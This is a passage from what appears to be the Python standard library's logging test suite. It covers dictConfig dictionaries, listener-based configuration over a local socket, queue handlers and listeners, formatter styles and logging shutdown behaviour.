'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
# Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
# Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
# Nothing will be output since handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
# Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
config = {
"version": 1,
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
support.join_thread(t, 2.0)
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.apply_config(self.out_of_order)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
def test_namedtuple(self):
# see bpo-39142
from collections import namedtuple
class MyHandler(logging.StreamHandler):
def __init__(self, resource, *args, **kwargs):
super().__init__(*args, **kwargs)
self.resource: namedtuple = resource
def emit(self, record):
record.msg += f' {self.resource.type}'
return super().emit(record)
Resource = namedtuple('Resource', ['type', 'labels'])
resource = Resource(type='my_type', labels=['a'])
config = {
'version': 1,
'handlers': {
'myhandler': {
'()': MyHandler,
'resource': resource
}
},
'root': {'level': 'INFO', 'handlers': ['myhandler']},
}
with support.captured_stderr() as stderr:
self.apply_config(config)
logging.info('some log')
self.assertEqual(stderr.getvalue(), 'some log my_type\n')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.name = 'que'
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
def test_formatting(self):
msg = self.next_message()
levelname = logging.getLevelName(logging.WARNING)
log_format_str = '{name} -> {levelname}: {message}'
formatted_msg = log_format_str.format(name=self.name,
levelname=levelname, message=msg)
formatter = logging.Formatter(self.log_format)
self.que_hdlr.setFormatter(formatter)
self.que_logger.warning(msg)
log_record = self.queue.get_nowait()
self.assertEqual(formatted_msg, log_record.msg)
self.assertEqual(formatted_msg, log_record.message)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = support.TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = support.TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
handler.close()
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_StreamHandler(self):
# Test that traceback only appends once (bpo-34334).
listener = logging.handlers.QueueListener(self.queue, self.root_hdlr)
listener.start()
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.que_logger.exception(self.next_message(), exc_info=exc)
listener.stop()
self.assertEqual(self.stream.getvalue().strip().count('Traceback'), 1)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener_with_multiple_handlers(self):
# Test that queue handler format doesn't affect other handler formats (bpo-35726).
self.que_hdlr.setFormatter(self.root_formatter)
self.que_logger.addHandler(self.root_hdlr)
listener = logging.handlers.QueueListener(self.queue, self.que_hdlr)
listener.start()
self.que_logger.error("error")
listener.stop()
self.assertEqual(self.stream.getvalue().strip(), "que -> ERROR: error")
if hasattr(logging.handlers, 'QueueListener'):
import multiprocessing
from unittest.mock import patch
class QueueListenerTest(BaseTest):
"""
Tests based on patch submitted for issue #27930. Ensure that
QueueListener handles all log messages.
"""
repeat = 20
@staticmethod
def setup_and_log(log_queue, ident):
"""
Creates a logger with a QueueHandler that logs to a queue read by a
QueueListener. Starts the listener, logs five messages, and stops
the listener.
"""
logger = logging.getLogger('test_logger_with_id_%s' % ident)
logger.setLevel(logging.DEBUG)
handler = logging.handlers.QueueHandler(log_queue)
logger.addHandler(handler)
listener = logging.handlers.QueueListener(log_queue)
listener.start()
logger.info('one')
logger.info('two')
logger.info('three')
logger.info('four')
logger.info('five')
listener.stop()
logger.removeHandler(handler)
handler.close()
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_queue_queue(self, mock_handle):
for i in range(self.repeat):
log_queue = queue.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@patch.object(logging.handlers.QueueListener, 'handle')
def test_handle_called_with_mp_queue(self, mock_handle):
# Issue 28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
for i in range(self.repeat):
log_queue = multiprocessing.Queue()
self.setup_and_log(log_queue, '%s_%s' % (self.id(), i))
log_queue.close()
log_queue.join_thread()
self.assertEqual(mock_handle.call_count, 5 * self.repeat,
'correct number of handled log messages')
@staticmethod
def get_all_from_queue(log_queue):
try:
while True:
yield log_queue.get_nowait()
except queue.Empty:
return []
def test_no_messages_in_queue_after_stop(self):
"""
Five messages are logged then the QueueListener is stopped. This
test then gets everything off the queue. Failure of this test
indicates that messages were not registered on the queue until
_after_ the QueueListener stopped.
"""
# Issue 28668: The multiprocessing (mp) module is not functional
# when the mp.synchronize module cannot be imported.
support.import_module('multiprocessing.synchronize')
for i in range(self.repeat):
queue = multiprocessing.Queue()
self.setup_and_log(queue, '%s_%s' %(self.id(), i))
# time.sleep(1)
items = list(self.get_all_from_queue(queue))
queue.close()
queue.join_thread()
expected = [[], [logging.handlers.QueueListener._sentinel]]
self.assertIn(items, expected,
'Found unexpected messages in queue: %s' % (
[m.msg if isinstance(m, logging.LogRecord)
else m for m in items]))
def test_calls_task_done_after_stop(self):
# Issue 36813: Make sure queue.join does not deadlock.
log_queue = queue.Queue()
listener = logging.handlers.QueueListener(log_queue)
listener.start()
listener.stop()
with self.assertRaises(ValueError):
# Make sure all tasks are done and .join won't block.
log_queue.task_done()
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
# test the default value introduced in 3.7
# (Issue #28524)
